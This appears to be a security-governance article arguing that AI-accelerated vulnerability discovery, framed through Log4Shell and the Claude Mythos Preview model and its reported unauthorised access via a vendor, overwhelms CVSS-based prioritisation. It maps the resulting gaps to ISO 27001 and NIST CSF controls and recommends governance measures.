The Discovery Gap:
Why AI Just Broke Every Security Model We Have
Log4j taught us vulnerabilities existed long before anyone found them. Claude Mythos just showed us what happens when that discovery process is no longer limited by human speed — and this week, an unauthorised group proved the containment model is already failing.
The Lesson Log4j Actually Taught Us
In December 2021, a researcher at Alibaba Cloud disclosed a vulnerability to the Apache Software Foundation. The flaw — now known as Log4Shell — existed inside a Java logging library called Log4j, embedded so deeply into global infrastructure that patching it required an emergency mobilisation of security teams worldwide. Within days of disclosure, attackers were exploiting it approximately two million times per hour. The vulnerability earned a perfect CVSS score of 10.
But here is the detail most reporting missed: Log4Shell had existed since 2013. For eight years it sat silently inside millions of systems — banks, government networks, critical infrastructure, cloud platforms. Apple iCloud. Amazon. It was not created when Chen Zhaojun found it. It was simply discovered.
That distinction is the foundation of everything that follows. The threat was never the discovery. The threat was the gap between existence and awareness.
It has always been when they are found."
The Shift: From Scarcity to Abundance
For decades, vulnerability management operated on a stable assumption: the number of discoverable vulnerabilities at any given time was constrained by human capacity. Researchers and threat actors moved at human speed. Organisations had an imperfect but functional window to assess, prioritise, and remediate. That window is now closing.
Then vs. Now
Pre-AI Era
- Discovery constrained by human bandwidth
- Patch cycles measured in days to weeks
- Manageable vulnerability backlogs
- CVSS scoring functional for prioritisation
- Reactive frameworks could absorb the pace
AI-Accelerated Era
- Discovery at machine speed — thousands per cycle
- Mean time to exploit now estimated at –7 days
- Backlogs operationally unmanageable at volume
- CVSS alone meaningless at scale
- Reactive frameworks structurally inadequate
This month, Anthropic announced Claude Mythos Preview — a model it described as too dangerous to release publicly. In pre-release testing, Mythos autonomously identified thousands of zero-day vulnerabilities across every major operating system and browser, and could chain them into working exploits. A capability that previously required nation-state-level expertise now runs overnight on an API call.
AI doesn't create vulnerabilities. It removes the time barrier to finding them. And that changes everything about how risk must be governed.
The Containment Model Is Already Failing
Anthropic's response was considered: a controlled release to critical infrastructure partners under Project Glasswing — Amazon, Apple, Google, Microsoft, Nvidia — with the aim of giving defenders a head start. That strategy has already encountered its first failure.
This week, Bloomberg reported that an unauthorised group has been accessing Claude Mythos Preview through a third-party vendor environment since April 7 — the same day as the public announcement. Anthropic confirmed it is investigating. The group gained access by guessing the model's API endpoint from Anthropic's naming conventions — not sophisticated hacking, but pattern recognition through a contractor relationship. The access method is now publicly documented.
The group states their intent is curiosity rather than harm. Security experts rightly point out that intent is irrelevant when the method is documented. This is not primarily a story about one group's access. It is a story about third-party vendor risk — the same vulnerability that Log4j exposed in 2021, and which remains structurally unresolved in most security programmes today.
The GRC Failure: Prioritisation at Impossible Scale
Vulnerability management exists to answer one question: which risks matter most, right now? That question only has a tractable answer when the number of inputs is manageable. When AI-driven discovery surfaces thousands of high-severity vulnerabilities in rapid succession, the prioritisation model doesn't strain — it breaks. When everything is critical, nothing is.
Current Control Failures
- 01CVSS scoring was designed for bounded vulnerability counts — not machine-generated volume. It cannot handle the backlog.
- 02Patch cycles assume time buffers that no longer exist. Mean time to exploit is now negative — exploitation before patching is the norm.
- 03Alert fatigue in SIEM environments already degrades detection quality. At post-Mythos volumes, it collapses.
- 04Third-party and dependency risk remains structurally unresolved. The Mythos breach came through a contractor, not Anthropic directly.
- 05Most governance policies don't yet define AI-specific risk ownership, acceptable use, or vendor AI access controls.
Framework Mapping
These failures map directly onto control objectives organisations are already committed to under ISO 27001 and NIST CSF — which makes the gap between commitment and reality difficult to defend at board level.
ISO/IEC 27001:2022
- A.12.6.1 — Vuln. mgmt overwhelmed by AI discovery volume
- A.16 — Incident response capacity under acute pressure
- A.8 — Asset mgmt incomplete; shadow dependencies untracked
- A.15 — Supplier security not continuously monitored
NIST CSF 2.0
- Identify — Attack surface inventory misses AI-discoverable vectors
- Protect — Traditional controls insufficient vs. automated exploitation
- Detect — SIEM signal-to-noise ratio collapsing
- Respond — Playbooks not calibrated for AI-speed incidents
- Recover — Recovery now frequent, not exceptional
Risk Assessment
| Risk Factor | Inherent Risk | Residual Risk |
|---|---|---|
| AI-accelerated exploitation at scale | Almost Certain | Likely |
| Unauthorised access to Mythos-class models | Confirmed | Under Investigation |
| Prioritisation model collapse under volume | Extreme | High |
| Third-party vendor risk propagation | Extreme | Partially Addressed |
| Governance frameworks adequacy for AI era | Inadequate | Inadequate |
How Will Organisations Cope?
The short answer: most won't — at least not initially. The industry is already behind before Mythos-level capabilities reach broad availability.
Automated, machine-speed defence
Organisations that survive will have built tightly integrated detection and response pipelines combining AI analytics, security orchestration, and pre-approved automated remediation. Early data shows these platforms achieving 90% automation of Tier-1 analyst tasks and 10× faster response times. They treat AI as an operational necessity on the defensive side, not an experiment.
Reactive restructuring
SANS Institute, the Cloud Security Alliance, and OWASP released an emergency strategy briefing this month — produced over a single weekend by 60+ contributors. The fact it was an emergency briefing, not a planned publication, tells you the current state of readiness. These organisations are restructuring around contextual risk scoring and continuous exposure monitoring — reactively.
Counting CVEs, missing the threat
Most organisations are still running CVSS-based prioritisation and human-paced patch cycles. Critical Microsoft vulnerabilities doubled year-over-year — 78 to 157 in 12 months — driven by AI-accelerated discovery. Many security dashboards are reporting this as good news because total CVE counts dipped. They are measuring the wrong thing entirely.
What Actually Needs to Change
- Establish an AI Risk Governance Policy — define acceptable use, monitoring, and explicit ownership of AI-driven vectors at board level
- Integrate AI threat modelling into annual risk assessments as a primary item, not an addendum
- Mandate vendor AI access controls — the Mythos breach came through a contractor; third-party agreements must include AI model governance
- Transition from CVSS-only to contextual risk scoring — asset criticality, real-time exposure, and business impact
- Shift from vulnerability management to exposure management — continuous, not point-in-time
- Mandate SBOM for all critical systems and extend to full supply chain dependencies
- Deploy SOAR — automated response pipelines are no longer optional at machine-speed attack rates
- Integrate threat intelligence feeds contextualising AI-discovered vulnerabilities against active exploitation data
- Automate patching for lower-criticality systems to preserve analyst capacity for high-impact decisions
- Enforce continuous vendor monitoring, not annual assessments
- Require contractors to disclose AI model access in standard security questionnaires
- Conduct dependency audits with explicit Log4j-class and Mythos-class breach scenarios in scope
The Strategic Shift Required
Log4j was a warning about dependency risk hiding in plain sight. The Mythos moment is a warning about something structural: our entire security architecture was designed for a world where vulnerabilities were scarce, human-discovered, and exploited at human speed.
That world ended this month.
The organisations that navigate this well won't be the fastest patchers. They'll be the ones that recognised earliest that the problem had fundamentally changed — and redesigned their measurement systems, governance frameworks, and operational models accordingly. Most will cope the way they always have: reactively, after something breaks.
The question is no longer: can we find vulnerabilities?
It is: can we make decisions fast enough in a world where discovery and exploitation are both automated?